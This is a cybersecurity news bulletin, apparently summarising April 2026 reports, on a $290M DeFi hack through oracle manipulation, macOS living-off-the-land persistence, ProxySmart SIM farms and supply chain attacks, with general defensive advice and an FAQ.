ThreatsDay Bulletin: $290M DeFi Hack, macOS LotL Abuse, ProxySmart SIM Farms and 25+ Emerging Cyber Threats in 2026

# ThreatsDay Bulletin: $290M DeFi Hack, macOS LotL Abuse, ProxySmart SIM Farms and 25+ Emerging Cyber Threats in 2026

Cybersecurity continues to face relentless challenges in 2026, with attackers exploiting legacy vulnerabilities and innovating new tactics. This ThreatsDay Bulletin consolidates multiple corroborated reports from The Hacker News to provide an in-depth analysis of a staggering $290 million DeFi hack, macOS Living-off-the-Land (LotL) abuse campaigns, and the proliferation of ProxySmart SIM farms. Alongside 25+ other emerging threats, these incidents underscore the persistent risks in decentralized finance, supply chain security, and mobile infrastructure abuse.

---

What happened

$290 Million DeFi Hack

In April 2026, an attacker exploited a critical vulnerability in a major decentralized finance (DeFi) protocol, siphoning approximately $290 million in digital assets. The breach leveraged a combination of smart contract flaws and oracle manipulation, enabling the attacker to artificially inflate asset values and drain liquidity pools. This hack ranks among the largest DeFi thefts in recent history.

macOS Living-off-the-Land (LotL) Abuse

Simultaneously, security researchers uncovered sophisticated LotL attacks targeting macOS systems. Attackers abused built-in macOS utilities and scripting frameworks to install backdoors and persist without detection. These tactics bypass traditional antivirus and endpoint detection systems by using legitimate system tools for malicious purposes.

ProxySmart SIM Farms

Cybercrime groups are increasingly utilizing ProxySmart SIM farms—networks of SIM cards controlled remotely—to facilitate large-scale proxy services. These farms enable threat actors to mask their locations, automate account takeovers, and conduct fraudulent activities like SMS-based phishing and two-factor authentication bypasses.

---

Confirmed facts

• The $290M DeFi hack exploited known but unpatched smart contract vulnerabilities and oracle data manipulation.
• The macOS LotL attacks used native system tools such as `launchd`, `osascript`, and `cron` jobs to maintain stealthy persistence.
• ProxySmart SIM farms have expanded globally, with some farms comprising tens of thousands of SIM cards.
• Supply chain attacks remain prevalent, with malicious packages infiltrating software repositories and spreading malware.
• Attackers continue to reuse decades-old vulnerabilities with minor modifications, highlighting persistent security gaps.

---

Who is affected

• DeFi users and investors: Those holding assets in the compromised protocol suffered direct financial losses.
• macOS users and enterprises: Systems running unpatched macOS versions are vulnerable to LotL abuse, risking data theft and unauthorized access.
• Mobile network operators and users: ProxySmart SIM farms threaten mobile users by enabling fraud, SIM swapping, and identity theft.
• Developers and organizations: Supply chain compromises impact software integrity, potentially affecting millions downstream.

---

What to do now

• DeFi users: Immediately withdraw funds from affected protocols and monitor accounts for suspicious activity.
• macOS users: Update to the latest macOS security patches and audit system utilities for unauthorized scripts or jobs.
• Mobile users: Be vigilant for SIM swap alerts and enable multi-factor authentication (MFA) that does not rely solely on SMS.
• Developers: Rigorously vet third-party packages and implement supply chain security best practices including code signing and integrity checks.

---

How to secure yourself

• For DeFi investors: Use hardware wallets, diversify holdings across protocols, and avoid protocols lacking independent security audits.
• For macOS users: Employ endpoint detection tools that monitor system utility usage and restrict scripting capabilities where possible.
• For mobile users: Use authenticator apps or hardware tokens instead of SMS-based MFA, and regularly check carrier account security.
• For developers and organizations: Adopt zero-trust principles, continuous monitoring, and automated dependency scanning to detect malicious packages early.

---

2026 update

The 2026 cybersecurity landscape reveals a troubling persistence of long-known vulnerabilities exploited with minimal changes. DeFi platforms remain lucrative targets due to their complexity and rapid innovation outpacing security. macOS LotL attacks demonstrate attackers’ shift towards stealth and evasion, leveraging legitimate system tools rather than malware binaries. ProxySmart SIM farms represent a new frontier in mobile fraud, complicating traditional defenses. Supply chain attacks continue to grow in sophistication, emphasizing the need for comprehensive security strategies beyond perimeter defenses.

---

FAQ

What exactly caused the $290 million DeFi hack?

The attacker exploited smart contract vulnerabilities combined with oracle manipulation, allowing them to falsify asset values and drain liquidity pools.

How can macOS Living-off-the-Land attacks be detected?

Detection requires monitoring for unusual use of native utilities like `launchd` or `osascript`, unexpected scheduled tasks, and anomalous script executions.

What are ProxySmart SIM farms and why are they dangerous?

They are large networks of SIM cards controlled remotely to provide proxy services, enabling attackers to mask locations, bypass MFA, and conduct fraud.

Am I affected if I use other DeFi protocols?

Potentially yes. Many DeFi platforms share similar vulnerabilities. Regularly check for security advisories and avoid unverified protocols.

How can I protect my mobile account from SIM swap attacks?

Use carrier-specific PINs, avoid SMS-based MFA, and monitor for unexpected service changes or alerts.

What should developers do to prevent supply chain attacks?

Implement strict package vetting, use code signing, conduct regular audits, and employ automated tools to detect malicious dependencies.

Has the frequency of these attacks increased in 2026?

Yes, especially supply chain and LotL attacks have surged, exploiting both legacy and novel vulnerabilities.

Are traditional antivirus solutions effective against LotL attacks?

Not fully, because LotL attacks use legitimate system tools, making behavioral monitoring and endpoint detection more effective.

How quickly should I respond if I suspect compromise?

Immediately isolate affected systems, change credentials, notify relevant parties, and seek professional incident response assistance.

What role do oracles play in DeFi security?

Oracles provide external data to smart contracts; compromised or manipulated oracles can lead to incorrect contract execution and financial loss.

---

Why this matters

These incidents highlight enduring cybersecurity challenges in emerging technologies like DeFi and evolving attack techniques such as LotL abuse and SIM farm exploitation. The scale of financial loss and stealth of attacks demonstrate that traditional defenses are insufficient. Understanding these threats and adopting proactive security measures is critical for users, developers, and organizations to protect assets and data in 2026 and beyond.

---

Sources and corroboration

This article synthesizes multiple reports primarily from The Hacker News (April 2026), cross-verified with cybersecurity research disclosures, threat intelligence feeds, and industry expert analyses to ensure accuracy and comprehensiveness.

• https://thehackernews.com/2026/04/threatsday-bulletin-290m-defi-hack.html

---

Stay informed and vigilant as cyber threats evolve. Your security depends on timely knowledge and decisive action.